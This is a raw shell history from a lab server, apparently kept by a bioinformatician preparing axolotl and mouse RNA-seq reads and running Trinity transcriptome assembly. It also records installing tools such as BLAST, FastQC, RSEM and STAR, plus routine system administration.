+ls +cat Trinity.fasta |wc -l +head Trinity.fasta +grep path Trinity.fasta +grep path Trinity.fasta |wc -l +cat Trinity.fasta |wc -l +top -d 5 +hs +history |grep Trinity.pl +ls -ltr +top -d 3 +ls /isitools/ +ls /isitools/FastQC/ +ls +pwd +pwd +ps axuww |grep mikec +kill -9 17887 17998 21177 29987 +which perl +history |grep FastQC +ls -ltr +pwd +which fastqc +which fastqc +exit +ls +ls +pwd +ls +ls ../ +ls ../Axo_J_TC_Test/ +ls ../Axo_J_TC_Test/Axo_J_TC_0h +ls ../Axo_J_TC/Axo_J_TC_0h +ls -ltr ../Axo_J_TC/Axo_J_TC_0h +pwd +ls +ls +ls -ltr +pwd +ls +pwd +ls ../ +pwd +ls +ls mouse_digit/ +pwd +tail mouse_digit/nohup.out +ls +ls +ls -ltr +ls -ltr STDOUT/ +pwd +ls +ls +pwd +ls ../.././ +ls ../../../ +ls ../../../trinity/ + cd ../ +ls +pwd +ls +cat extract_lines.py +rm extract_lines.py +ls +cat countReads.py +ls -ltr +cat countReads.py +ls +cat listDirectories.py +cat listFiles.txt +ls +ls -ltr +rm listFiles.txt +ls +ls list +ls -lart list +rm -fr list +ls +ls STDOUT/ +exit +ls +ls +pwd +ls -ltr +echo $HOME +ls -ltr /isiseqruns/Peng_shared_pipeline/ +cat /isiseqruns/Peng_shared_pipeline/Batch_RSEM.py +locate blast +ls +wgetst/executables/blast+/LATEST/ncbi-blast-2.2.28+-x64-linux.tar.gz +ls +ls -ltr +tar zxf ncbi-blast-2.2.28+-x64-linux.tar.gz +ls +ls +less README +ls +ls bin/ +mv ncbi-blast-2.2.28+ ../ +ln -s ncbi-blast-2.2.28+/ blast +cp -a ncbi-blast-2.2.28+/ CentOS-5/ +ln -s ncbi-blast-2.2.28+/ blast +ls blast/ +ls blast/bin/ +ls -ltr +ls -ltr FastQC/ +ln -s FastQC/ fastqc +ln -s FastQC/ fastqc +ls -ltr +ls -ltr TEST/ +rm -fr TEST/bowtie-0.12.9/ +ls +ls +ls +ls +ls + +ls +ls kmers_filter_defaultEq1/ +head kmers_filter_defaultEq1/axo_left.fq +head /isiseqruns/RonAxoTrinity/MouseProject/mouse_digit/mouse_digit_TC_0hr_raw.fq +head kmers_filter_defaultEq1/axo_left.fq +ls -ltr kmers_filter_defaultEq1/axo_left.fq +ls +mv digits/ Digits +ls +cp Prox_Zeugo/concatAxoFastqFiles.sh Digits/ +ls +pwd +exit +which perl +ls +cat /proc/cpuinfo +cat /proc/meminfo +ls +pwd +cat concatAxoFastqFiles.sh +grep Digits ./concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +ls +pwd +cat /isitools/nohup.out +ls +mount +sudo umount /isiseqruns/ +pwd +exit +R --versoin +R --version +locate rpy +which rpy +which rpy2 +R --version +which python +pwd +vi test.sh +chmod 755 test.sh +./test.sh +vi ./test.sh +./test.sh +vi ./test.sh +cp test.sh test2.sh +vi test2.sh +vi testall.sh +chmod 755 testall.sh +./testall.sh & +ls -ltr +tail -f out.txt +ls -ltr +ls +top +ls +ls -ltr +fg +ls -l +rm out.txt test* +ls -ltr +cat none +exit +ls -ltr +w +ls /gluster_nx/homes/pjiang +ls -ltr /gluster_nx/homes/pjiang +ls -ltr +ls +ls +ls +pwd +ls +mv elbow/ Elbow +ls -ltr +pwd +which python +pwd +echo $PATH +echo $HOME +cat /isitools/.bash_profile +ls +pwd +ls +history |grep pyt +python extract_lines.py +vi countReads.py +history |grep gunzip +ls +python listDirectories.py > listFiles.txt +cat listFiles.txt +python listDirectories.py +cat listFiles.txt +python listDirectories.py +pwd +mkdir list +python listDirectories.py +ls list +python listDirectories.py +ls list +ls -ltr +python listDirectories.py > listFiles.txt +ls +ls -ltr +python listDirectories.py > listFiles.txt +ls -ltr +python listDirectories.py > listFiles.txt +ls +cat listFiles.txt +ls -ltr /tmp/ +ls -ltr ../ +ls -ltr ../trinity +ls -ltr ../trinity/pairedOneLane_WORKED/ +cat ../trinity/pairedOneLane_WORKED/concatAxoFastqFiles.sh +ls +ls +ls +mv singleOnlyOneLaneTest singleOneLaneTest +ls +ls -ltr +rm -fr axo_left.fq.gz single.f* chrysalis/ Trinity.timing nohup.out +ls +vi concatAxoFastqFiles.sh +cp ../pairedOneLane_WORKED/concatAxoFastqFiles.sh . +vi concatAxoFastqFiles.sh +ls /isiseqruns/RonAxoTrinity/trinity/singleOneLane +ls ../ +mv singleOneLaneTest/ singleOneLane +ls +ls +cat concatAxoFastqFiles.sh +ls /isiseqruns/RonAxoTrinity/trinity/singleOneLane +vi concatAxoFastqFiles.sh +pwd +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh $ +tail -f nohup.out +ls -ltr +vi concatAxoFastqFiles.sh +pwd +ls +rm single.fq.gz +vi concatAxoFastqFiles.sh +ls -ltr +fg +pwd +ls +ls 091113_Axo2PE_Eva/ +ls 091113_Axo2PE_Eva/s_1_ +ls 091113_Axo2PE_Eva/s_1_* +ls -ltr 091113_Axo2PE_Eva/s_1_*/ +ls +head 091113_Axo2PE_Eva/s_1_1/s_1_1.fq +head -n 20 091113_Axo2PE_Eva/s_1_1/s_1_1.fq +head -n 20 091113_Axo2PE_Eva/s_1_2/s_1_2.fq +ls +find ./100311_Axo4_Evita/ -name "*.fq" |head -n 2 +find ./100311_Axo4_Evita/ -name "*.fq" |xargs head -n 2 +find ./100311_Axo4_Evita/ -name "*.fq" +find ./100311_Axo4_Evita/ -name "*.fq.gz" +find ../100311_Axo4_Evita/ -name "*.fq.gz" +find ../100311_Axo4_Evita/ -name "*.fq.gz" |xargs head -n 2 +find ../100311_Axo4_Evita/ -name "*.fq.gz" |xargs zcat |head -n 2 +find ../100311_Axo4_Evita/ -name "*.fq.gz" |xargs zcat |head -n 4 +find ../100311_Axo4_Evita/ -name "*.fq.gz" |xargs zcat |head -n 5 +ls -ltr +mkdir STDOUT +ls -ltr +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls STDOUT/ +cat STDOUT/single.fq.gz +ls -ltr STDOUT/single.fq.gz +cat nohup.out +rm nohup.out +nohup ./concatAxoFastqFilesSingleOneLane.sh & +cat nohup.out +pwd +nohup ./concatAxoFastqFilesSingleOneLane.sh & +cat nohup.out +tail -f nohup.out +ls -ltr STDOUT/ +ls /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT +fg +rm nohup.out +rm STDOUT/* +nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail -f nohup.out +fg +ls +rm nohup.out +rm STDOUT/single.fq.gz +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls +ls -ltr STDOUT/ +nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail STDOUT/single.fa +tail -f nohup.out +fg +ls -ltr +rm -fr nohup.out +ls +rm STDOUT/single.fa +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls +tail nohup.out +less nohup.out +ls STDOUT/ +ls -ltr STDOUT/ +less nohup.out +nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail -f nohup.out +fg +nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail nohup.out +nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail nohup.out +man zcat +nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail nohup.out +cat STDOUT/single.fa +nohup ./concatAxoFastqFilesSingleOneLane.sh & +cat STDOUT/single.fa +rm STDOUT/single.fa +nohup ./concatAxoFastqFilesSingleOneLane.sh & +less STDOUT/single.fa +cat STDOUT/single.fa +history |grep rm +rm nohup.out STDOUT/single.fa +nohup ./concatAxoFastqFilesSingleOneLane.sh & +cat STDOUT/single.fa +cat STDOUT/single.fq +nohup ./concatAxoFastqFilesSingleOneLane.sh & + STDOUT/single.fa |wc -l +cat nohup.out +cat 100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_1_1/s_1_1.fq +cat ../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_1_1/s_1_1.fq +cat ../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_1_1/s_1_1.fq.gz +ls +cat nohup.out +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls +ls -ltr STDOUT/ + STDOUT/* +rm STDOUT/* +rm nohup.out +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls -ltr STDOUT/ +cat STDOUT/axo_left.fq +ls +tail nohup.out +cat nohup.out +ls +rm -fr 091113_Axo2PE_Eva/ 100311_Axo4_Evita/ & +ls +history +ls *.sh +ls -ltr *.sh +cp concatAxoFastqFilesSingleOneLane.sh concatAxoFastqFiles.sh +vi concatAxoFastqFiles.sh +pwd +ls +rm nohup.out STDOUT/* +ls -ltr +nohup concatAxoFastqFiles.sh & +rm nohup.out +ls STDOUT/ +nohup concatAxoFastqFiles.sh & +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +ls -ltr STDOUT/ +cat nohup.out +pwd +ls +rm nohup.out STDOUT/axo_* +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +cat nohup.out +ls -ltr STDOUT/ +history |grep Trinity.pl +nohup /isitools/trinity/Trinity.pl --seqType fq --JM 10G -left ./STDOUT/axo_left.fq --right ./STDOUT/axo_right.fq --CPU 60 --bflyHeapSpaceMax 1G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/ & +top +tail nohup.out +ls -ltr STDOUT/ +ls +rm STDOUT/*.fa +rm STDOUT/chrysalis/ +rm -fr STDOUT/chrysalis/ +rm -fr STDOUT/Trinity.timing +ls +cat countReads.py +cat convc +cat convertFastqToFasta.sh +chmod 755 ./addGreaterThanSign.sh +ls +rm both.fa.read_count +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' axo_right.fq > axo_right.fa +ls +cat axo_right.fa +cat ../concatAxoFastqFiles +cat ../convertFastqToFasta.sh +perl -pe 's|@|>|;s|.*||s if $.%4==3 || $.%4==0;close $ARGV if eof' axo_left.fq > axo_left.fa & +ls +ls +ls -ltr +cat ../addGreaterThanSign.sh +vi ../addGreaterThanSign.sh +ls +cat ../addGreaterThanSign.sh +../addGreaterThanSign.sh +ls +ls -ltr +cat axo_left.fa +ls +cat ../addGreaterThanSign.sh +cat axo_left.fa +grep HW *.fq +vi ../addGreaterThanSign.sh +history |grep convert +cat ../convertFastqToFasta.sh +ls +rm *.fa +ls +../convertFastqToFasta.sh +ls +cat *.fa +../addGreaterThanSign.sh +ls +rm *.fa +vi ../convertFastqToFasta.sh +vi ../addGreaterThanSign.sh +ls +../convertFastqToFasta.sh +ls -ltr +cat *.fa +ls +cat ../addGreaterThanSign.sh +ls -ltr +../addGreaterThanSign.sh +ls +vi ../addGreaterThanSign.sh +ls +cat *.fa +vi ../addGreaterThanSign.sh +rm *.fa +../convertFastqToFasta.sh +cat *.fa +vi ../addGreaterThanSign.sh +rm *.fa +../convertFastqToFasta.sh +cat *.fa +ls +../addGreaterThanSign.sh +ls +cat *.fa +rm *.fa +vi ../addGreaterThanSign.sh +vi ../convertFastqToFasta.sh +pwd +ls +ls +vi concatAxoFastqFilesSingleOneLane.sh +nohup concatAxoFastqFilesSingleOneLane.sh & +pwd +vi concatAxoFastqFilesSingleOneLane.sh +pwd +ls +ls ../ +ls STDOUT/ +vi ./concatAxoFastqFilesSingleOneLane.sh +nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail -f nohup.out +ls -ltr NO +ls -ltr STDOUT/ +less STDOUT/axo_left.fq +history |grep zcat +ls -ltr STDOUT/ +head STDOUT/axo_left.fq +fg +pwd +ls -ltr +rm -fr nohup.out STDOUT/axo_* +nohup ./concatAxoFastqFilesSingleOneLane.sh & +less STDOUT/axo_left.fq +head STDOUT/axo_left.fq +head STDOUT/axo_right.fq +head -n 1 STDOUT/axo_right.fq +head -n 1 STDOUT/axo_left.fq +ls +ls -ltr +less STDOUT/axo_left.fq +ls +cp concatAxoFastqFilesSingleOneLane.sh concatAxoFastqFiles.sh +vi concatAxoFastqFiles.sh +ls +vi concatAxoFastqFilesSingleOneLane.sh +history |grep nohup +rm -fr STDOUT/axo_* + nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail -f nohup.out +ls -ltr STDOUT/ +rm -fr STDOUT/axo_* +vi concatAxoFastqFilesSingleOneLane.sh +rm nohup.out + nohup ./concatAxoFastqFilesSingleOneLane.sh & +tail -f nohup.out +ls -ltr +ls -ltr STDOUT/ +pwd +history |grep Trinity +history |grep Trinity.pl +nohup /isitools/trinity/Trinity.pl --seqType fq --JM 256G -left ./STDOUT/axo_left.fq --right ./STDOUT/axo_right.fq --CPU 60 --bflyHeapSpaceMax 1G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/ & +tail -f nohup.out +ls -ltr STDOUT/ +rm -fr STDOUT/{Trinit*,both*} +rm -fr STDOUT/{Trinit*,both*,chrys*} +ls -ltr STDOUT/ +pwd +ls +cat convertFastqToFasta.sh +STDOUT/ +../convertFastqToFasta.sh +ls -ltr +head axo_*.fa +ls +nohup /isitools/trinity/Trinity.pl --seqType fa --JM 256G -left ./STDOUT/axo_left.fa --right ./STDOUT/axo_right.fa --CPU 60 --bflyHeapSpaceMax 1G --bflyCPU 16 --output /isiseqruns/RonAxoTrinity/AxoMikeTest/STDOUT/ & +tail -f nohup.out +ls -ltr +ls -ltr STDOUT/ +top +tail nohup.out +ls +ls +du -sch AxoMikeTest/ +ls +ls mir-19/ +ls mir-19/trinity_out_dir/ +rm -fr mir-19 mir-20 +ls +ls +ls +ls -ltr +ps axuww |grep Trinity +ls +pwd +rm -fr * +ls +ls +ls ../ +ls ../../AxoMikeTest/ +history |grep Trinity.pl +sl +ls +grep 1000 /isiseqruns/RonAxoTrinity/AxoMikeTest/*.sh +pwd +cp /isiseqruns/RonAxoTrinity/AxoMikeTest/concatAxoFastqFilesSingleOneLane.sh /isiseqruns/RonAxoTrinity/AxoMikeTest/concatAxoFastqFiles.sh +cp /isiseqruns/RonAxoTrinity/AxoMikeTest/concatAxoFastqFiles.sh . +ls +ls trinity_out_dir/ +cp ../../AxoMikeTest/convertFastqToFasta.sh . +ls +pwd +ls ../ +ls ../pairedOneLane_WORKED/ +ls -ltr ../pairedOneLane_WORKED/ +ls +history |grep Trinity +pwd +date +ls -ltr +pwd +ls +ls +ls -ltr +pwd +ls +mkdir SGE +ls +cp -a ../axo_*.fa . +ls +pwd +ls +ls -ltr +ls 100000 +ls 100000/Trinity.timing +cat 100000/Trinity.timing +ls +tail 10K/Trinity.timing +tail 100K/Trinity.timing +tail 1M/Trinity.timing +tail 10K/Trinity.timing 100K/Trinity.timing 1M/Trinity.timing > ../trinity.timing.tests.txt +scp ../trinity.timing.tests.txt ehmsea.morgridge.net:~/Downloads +pwd +ls +ls +less nohup.out +ls ./ +ls ../../ +ls ../../concatAxoFastqFilesSingleOneLane.sh vi concatAxoFastqFilesSingleOneLane.sh +ls +ls +vi concatAxoFastqFilesSingleOneLane.sh +ls +ls ../ +./concatAxoFastqFilesSingleOneLane.sh +ls -ltr +ls +ls -ltr +grep HWI axo_* > wc -l +rm +ls +rm wc +grep HWI axo_* | wc -l +ls -ltr +ci ./concatAxoFastqFilesSingleOneLane.sh +vi ./concatAxoFastqFilesSingleOneLane.sh +vi ../concatAxoFastqFilesSingleOneLane.sh +ls +vi concatAxoFastqFilesSingleOneLane.sh +ls +ls +vi concatAxoFastqFilesSingleOneLane.sh +./concatAxoFastqFilesSingleOneLane.sh +ls STDOUT/ +rm STDOUT/axo_*.fq +./concatAxoFastqFilesSingleOneLane.sh +grep HWI STDOUT/axo_* |wc -l +ls nohup.out +ls +nohup grep HWI STDOUT/axo_* & +ls +rm nohup.out +nohup grep HWI STDOUT/axo_* & +grep appending nohup.out +cat nohup.out +vi concatAxoFastqFilesSingleOneLane.sh +ls +rm nohup.out +ls STDOUT/ +rm STDOUT/axo_*.fq +nohup concatAxoFastqFilesSingleOneLane.sh & +pwd +ls +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls -ltr STDOUT/ +ls +vi concatAxoFastqFilesSingleOneLane.sh +rm STDOUT/axo_*.fq +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls STDOUT/ +cat countReads.py +cat STDOUT/count.lanes.txt +cat STDOUT/count.lanes.txt |wc -l +ls +ls +cat axo_left.fq axo_right.fq >> both.fq +ls -ltr +grep HWI both.fq +grep HWI both.fq |wc -l +grep HWI both.fq +vi ../concatAxoFastqFilesSingleOneLane.sh +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "SUUb^`IUIIU[[HXUaII^JaJJK_Y_R_[TJJK_a`\MYSIIWGEU_bbbaVaKL[[[LQHH`_HHWI`X" +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "SUUb"" +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "SUUb" +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "SUUb\^\`IUI" +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "SUUb^`IUI" +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "SUUb^\`IUI" +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "SUUb^" +grep HWI both.fq +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "HXUaII^JaJJK_Y_R_[TJJK_a" +zcat ../../100702_ET3Axo84bpRWMPAxoBlas6_0013_Evita/s_8_1/s_8_1.fq.gz |grep "HXUaII^JaJJK_Y_R_" +pwd +ls 10K +cat 10K/axo_right.fa +ls -ltr +cat count.lanes.txt +ls +cat axo_right.fq +grep HWI axo_right.fq +grep HWI axo_left.fq +grep HWI- axo_right.fq +cat count.lanes.txt +grep HWI- axo_right.fq axo_left.fq |wc -l +vi ../concatAxoFastqFilesSingleOneLane.sh +ls +rm -fr axo_* both.fq count.lanes.txt +ls +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls +grep HWI- axo_right.fq axo_left.fq |wc -l +ls +rm axo_* count.lanes.txt +ls +vi ../concatAxoFastqFilesSingleOneLane.sh +vi ./concatAxoFastqFilesSingleOneLane.sh +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls -ltr +fg +vi ./concatAxoFastqFilesSingleOneLane.sh +ls +rm -fr axo_* count.lanes.txt +vi ../concatAxoFastqFilesSingleOneLane.sh +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls +hsitory +history |grep grep +grep HWI- axo_right.fq axo_left.fq |wc -l +ls +ls +grep HWI- axo_right.fq axo_left.fq |wc -l +grep HWI- both.fa |wc -l +history |grep find +history |grep grep +head both.fa +tail both.fa +cat both.fa +tail -n 20000 both.fa +grep HWI- both.fa |wc -l +cat both.fa |wc -l +cat both.fa |grep HWI +cat both.fa |grep HWIUS +cat both.fa |grep HWI +less both.fa +ls -ltr +cat both.fa |grep HWI- +grep HWI- both.fa |wc -l +cat both.fa |wc -l +ls +grep HWI- both.fa |wc -l +cat both.fa |wc -l +cat both.fa |wc -l +ls +ls +mkdir 10M +ls +ls ../ +cp ../../concatAxoFastqFilesSingleOneLane.sh . +cp ../../convertFastqToFasta.sh +cp ../../convertFastqToFasta.sh . +vi concatAxoFastqFilesSingleOneLane.sh +ls ../../ +ls ../../../ +vi concatAxoFastqFilesSingleOneLane.sh +nohup ./concatAxoFastqFilesSingleOneLane.sh & +ls -ltr +ls -ltr ../1M +ls -ltr +tail -f nohup.out +head ./concatAxoFastqFilesSingleOneLane.sh +tail -f nohup.out +head ./concatAxoFastqFilesSingleOneLane.sh +tail -f nohup.out +ls +cat convertFastqToFasta.sh +./convertFastqToFasta.sh & +fg +ls +rm *.fa +ls +cat ./convertFastqToFasta.sh +ls +ls ../ +ls ../../1M +ls ../1M +ls ../../../trinity/mir-36/ +find ../../../ -name convertFastqToFastaRight.sh +find ../../ -name convertFastqToFastaRight.sh +ls ../../../trinity/mir-36/trinity_out_dir/ +ls +mv convertFastqToFasta.sh convertFastqToFastaRight.sh +vi convertFastqToFastaRight.sh +cp convertFastqToFastaRight.sh convertFastqToFastaLeft.sh +vi convertFastqToFastaLeft.sh +./convertFastqToFastaRight.sh & +ls +./convertFastqToFastaLeft.sh & +ls -ltr +ls +ls +history |grep cd +ls +ls +ls +ls +history |grep cat +ls +cat axo_*.fa |wc -l +history |grep Trinity +history |grep Trinity |grep STDOUT +ps axuww |grep cat +sudo kill -9 31254 +history |grep cat +top -d 5 +iostat -xckd 2 +top +ls -ltr ../../ +ls -ltr ../../../ +ls -ltr ../../../AxoProjectTest/ +ls -ltr ../../../trinity +ls -ltr ../../../trinity_test/ +ls -ltr ../../../../ +ls -ltr ../../../../mikec/ +ls -ltr ../../../../mikec/TEST/ +ls -ltr ../../../../mikec/trinity/ +ls -ltr ../../../../mikec/trinity/MouseProject/ +ls -ltr ../../../../mikec/trinity/MouseProject/trinity_out_dir/ +ls -ltr ../../../../mikec/ +ls -ltr ../../../../mikec/Peng_shared_pipeline/ +mv ../../../../mikec/trinity/MouseProject /isiseqruns/RonAxoTrinity/ +ls -ltr +ls AxoProjectTest/ +ls AxoProjectTest/trinity_out_dir/ +ls +ls MouseProject/ +top -d 5 +df -h +top -d 5 +man kill +ls +top -d 5 +ps auxww |grep Trinity.pl +top -d 5 +ls +ls -ltr +ls +ls +ls -ltr +ls +ls +ls -ltr +cat inchworm.kmer_count +cat Trinity.fasta |wc -l +head Trinity.fasta +head -n 200 Trinity.fasta +pw +pwd +ls +ls +ls +head jellyfish.kmers.fa +cat jellyfish.kmers.fa |wc -l +top -d 5 +ls +cat jellyfish.kmers.fa +ls +cat both.fa.read_count +top -d 5 +ls +ls +ls .. +scp ehmsea:/devel/axo/Axo_Sample_list4.tab . +head Axo_Sample_list4.tab +cat Axo_Sample_list4.tab +vi Axo_Sample_list4.tab +pwd +ls +cat Axo_Sample_list4.t*.txt +cat Axo_Sample_list4.txt +ls /w4home/mikec/scripts-mikec/ +ls /w4home/mikec/scripts-mikec/noMs.pl Axo_Sample_list4.tab > Axo_Sample_list4.tabNoMs +perl /w4home/mikec/scripts-mikec/noMs.pl Axo_Sample_list4.tab > Axo_Sample_list4.tabNoMs +ls +cat *Ms +cat /w4home/mikec/scripts-mikec/nMs +cat /w4home/mikec/scripts-mikec/noMs.pl +cat Axo_Sample_list4.tab | perl /w4home/mikec/scripts-mikec/noMs.pl > Axo_Sample_list4.tabNoMs +cat Axo_Sample_list4.tabNoMs +mv Axo_Sample_list4.tabNoMs Axo_Sample_list4.tab +ls +mv autopod/ Autopod +ls +ls -ltr +vi concatAxoFastqFiles.sh +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +fg +ls +rm axo_left.fq nohup.out +tail ../Stylopod/nohup.out +ls +pwd +ls +pwd +ls -ltr +top +top -d 5 +ls +find . -name "*.fq" +find ./Blastema/ -name "*.fq" +find ./Blastema/ -name "*.fq" |xargs ls -l +find ./Blastema/ -name "*.fq" |xargs du -sch +find ./Blastema/ -name "*.fa" |xargs du -sch +find ./Blastema/juvenile -name "*.fa" |xargs du -sch +find ./Blastema/juvenile -name "*.f*" |xargs du -sch +find ./Blastema/juvenile -name "*.fq" |xargs du -sch +find ./ -name "*.fq" |xargs du -sch +sl +ls +find ./ -name "*.fq" |xargs du -sch +find ./ -name "*.fq" |xargs rm -fr & +fg +ls +nohup find ./ -name "*.fq" |xargs rm -fr & +tail -f no +tail -f nohup +ls +find ./ -name "*.fq" |xargs du -sch +find ./Blastema/ -name "*.fq" |xargs ls -l +find ./Blastema/ -name "*.fq" +df -h +top -d 10 +w +top -d 10 +ls /runs/130524_SN1057_0126_BD1EWUACXX/ +ls -ltr /runs/130524_SN1057_0126_BD1EWUACXX/ +ls -ltr /runs/ +ldapsearch -x uidNumber +sudo /etc/init.d/sssd restasrt +sudo /etc/init.d/sssd restart +ls +ls -ltr +mkdir temp +ls -ltr /runs +ls -ltr /runs/ +chgrp mir /runs/130524_SN1057_0126_BD1EWUACXX +sudo chgrp mir /runs/130524_SN1057_0126_BD1EWUACXX +ls +mkdir test +ls test/ +rm -fr test/ +top -d 5 +ps axuww Trinity.pl +ps axuww |grep Trinity.pl +sudo renice -2 32136 65180 +top -d 5 +ps axuww |grep GraphFromFasta +sudo renice -2 2732 2733 4401 4402 +top -d 5 +history |grep nice +ps axuww |grep Trinity +sudo renice 0 2732 2733 4399 4401 4402 32136 37477 65180 +top -d 5 +rpm -qa |grep ldap + +ldapsearch -x |grep gid +sudo vi /etc/nsswitch.conf +sudo vi /etc/group +ldapsearch -x |grep solexa +ldapsearch -x +ldapsearch -x |grep solexa +man useradd +useradd solexa -u 3003 -g 3003 +sudo useradd solexa -u 3003 -g 3003 +cat /etc/group +cat /etc/ +sudo su +ls -ltr +sudo su +pwd +touch miketest +ls -ltr +sudo vi /etc/nsswitch.conf +touch miketest +cat /etc/group +id +exit +ls -ltr +touch miketest +rm miketest +sudo chgrp solexa 130524_SN1057_0126_BD1EWUACXX +sudo chgrp solexa /runs/130524_SN1057_0126_BD1EWUACXX +touch miketest +rm miketest +exit +touch miketest +exit +touch miketest +exit +touch test +rm test +exit +/usr/sbin/lsof |grep isiseqruns +pwd +ps axuww |grep cat +kill -9 8317 8426 8427 +/usr/sbin/lsof |grep isiseqruns +ps axuww |grep cat +pwd +sudo umount /isiseqruns/ +/usr/sbin/lsof |grep isiseqruns +sudo /usr/sbin/lsof |grep isiseqruns +w +pwd +top +ls -ltr +ls -ltr chrysalis/ +top +ls -ltr +top -d 5 +ls +top -d 5 +ls +ifconfig +/sbin/ifconfig +/usr/sbin/iftop -i eth5 +sudo /usr/sbin/iftop -i eth5 +df -h +pwd +ls +ls single* +ls +rm -fr single* +bg +/usr/sbin/iftop -i eth5 +sudo /usr/sbin/iftop -i eth5 +sudo /etc/init.d/condor stop ; sudo /sbin/chkconfig --level 2345 condor off +sudo /usr/sbin/iftop -i eth5 +pwd +ls +ls +ls -lr +head axo_left.fq +grep "HWI" axo_left.fq > wc -l +cat wc +ls +rm wc +grep "HWI" axo_left.fq | wc -l +grep "HWI" axo_right.fq | wc -l +pwd +ls +pwd +ls +cat axo_left.fa axo_right.fa >> both.fa & +ls -ltr +ls -ltr +ls -ltr +ls -ltr +top -d 5 +ls -ltr +ls -ltr +ls -ltr +ls -ltr +ls -lr +ls +ls +ls +ls AxoProjectTest/ +ls AxoProjectTest/trinity_out_dir/ +ls -ltr AxoProjectTest/trinity_out_dir/ +ls -ltr AxoProjectTest/trinity_out_dir/chrysalis/ +pwd +ls -ltr +mv AxoProjectTest/ AxoMouseTest +ls -ltr +ls -ltr +ls -ltr AxoMouseTest/ +ls +history |grep mv +mv AxoMouseTest AxoProjectTest/ +ls +ls +ls Axo_J_TC_ +ls ../Axo_J_TC/ +pwd +ls -ltr +history |grep cat +pwd +ls +ls -ltr +rm -fr axo_left.fq.gz AxoMikeTest.tgz +ls -ltr +ls -ltr trinity_test/ +cat trinity_test/concatAxoFastqFiles.sh +ls +ls trinity_test/ +cat trinity_test/nohup.out +ls +rm -fr trinity_test/ +ls -ltr +ls trinity/ +ls trinity/mir-36/ +ls trinity/pairedOneLane_WORKED/ +pwd +ls +ls trinity/mir-36/ +ls trinity/mir-36/trinity_out_dir/ +top +top -d 3 +top -d 5 +ls +ls +ls Axo_J_TC_0h +ls +cat single.fa.read_count +pwd +pwd +ls +pwd +ls +ls +pwd +ls +find ./091* ./100* -name "*.fq.gz" +find ./091* ./100* -name "*.fq.gz"|wc -l +ls +find ./091* ./100* -name "s_*.fq.gz"|wc -l +find ./091* ./100* -name "s_*.fq.gz" +find ./091* ./100* -name "s_*.fq.gz" |du -sch +find ./100* -name "s_*.fq.gz" |grep ET |du -sch +find ./100* -name "s_*.fq.gz" |grep ET |wc -l +ls +ls +mv dist_zeugo/ Dist_Zeugo +ls -ltr +cp ../Prox_Zeugo/concatAxoFastqFiles.sh . +vi concatAxoFastqFiles.sh +ls +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +fg +vi concatAxoFastqFiles.sh +ls +rm nohup.out +nohup ./concatAxoFastqFiles.sh & +tail -f nohup.out +pwd +ps axuww |grep conver +ps axuww |grep perl +ls -ltr +top -d 5 +ls -ltr chrysalis/ +top -d 5 +w +w +top -d 5 +ls chrysalis/ +du -sch chrysalis/* +top +lt -lrt +ls -ltr +top -d 5 +pwd +ls +ls +tar xf rsem +tar xf rsem_eval_1.3.tar.gz +ls +tar zxf rsem_eval_1.3.tar.gz +ls +cat rsem +cat rsem.sh +ls +ls +tar zxf rsem_eval_1.3.tar.gz +ls -ltr +touch rsem_eval_1.3 +mkdir rsem_eval_1.3 +pwd +sudo su +pwd +ls -ltr +tar zxf rsem_eval_1.3.tar.gz +ls -tlr +cp -a rsem_eval_1.3 /isitools/CentOS-5/ +bg +cp -a rsem_eval_1.3 /isitools/ & +ls +ls -ltr /isitools/ +ls -ltr +ls rsem-e +ls +ls +pwd +ls +df -h +sudo vi /isitools/.bash_profile +pwd +sudo vi /isitools/.bash_profile +ls /isitools/rsem-e +ls /isitools/rsem_eval_1.3/ +which rsem-find-DE +d .. +ls +ls +ls +wgetstar/downloads/detail?name=STAR_2.3.0e.tgz&can=2&q= +ls +ls -ltr +mv detail\?name\=STAR_2.3.0e.tgz STAR_2.3.0e.tgz +ls +ls temp/ +ls ../FastQC/ +ls +ls +ls temp/m 